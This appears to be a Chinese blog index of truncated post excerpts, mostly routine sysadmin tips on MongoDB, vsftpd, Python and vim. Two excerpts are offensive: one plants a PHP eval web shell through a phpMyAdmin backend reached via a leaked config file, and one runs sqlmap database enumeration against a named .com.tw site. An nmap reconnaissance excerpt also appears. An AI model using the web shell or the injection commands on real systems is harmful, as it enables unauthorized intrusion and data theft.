进入到phpmyadmin后台（本例中以bak配置文件泄露为例）12345  create table foo(`cmd` text not null);  insert into `foo`(`cmd`) values ("<?php @eval($_POST['foo']);?>") ...

1.首先新建目录replset用来存数据库文件，在replset下新建三个目录，db,db1,db2.1  mongod --port 270xx --dbpath=\replset\dbx\ --replSet replset（这里端口测试依次为27018，27019，27020）打开三个数据库服 ...

进入vsftpd配置文件 vim /etc/vsftpd/vsftpd.conf 禁止匿名用户anonymous登录 anonymous_enable=NO 允许本地用户登录 local_enable=YES 让登录的用户有写权限(上传，删除) write_enable=YES ...

命运没有既定的轨迹

在查询时，我们也许也会用到or操作。语法格式如下：1$db->find(array('$or' => array(array('id' => 1), array('name' => 'java')))); 例如上面的例子，我们查询id是1，或者name是java的数据。

检查注入点1sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 列数据库信息1sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs 指定库名列出所有表1sqlmap ...

获取远程主机的系统类型及开放端口1nmap -sS -P0 -sV -O <target> 这里的 < target > 可以是单一 IP, 或主机名，或域名，或子网 -sS TCP SYN 扫描 (又称半开放,或隐身扫描) -P0 允许你关闭 ICMP pings. -sV ...

使用 python setup.py install 来安装python包，但卸载只能手动删除安装的文件 可以使用如下命令123python setup.py install --record files.txt   # 记录安装后文件的路径  cat files.txt | xargs rm -r ...

Problem：用vim编辑器时出现提示： Taglist: Exuberant ctags (http://ctags.sf.net) not found in PATH. Plugin is not loaded. Reason：taglist plugin不能找到ctags 程序 Try：1 ...

具体步骤12345678910111213wget --no-check-certificate https://pypi.python.org/packages/source/p/pymongo/pymongo-3.0.tar.gz # 20150419时官方的版本为3.0# 注意：wget获取 ...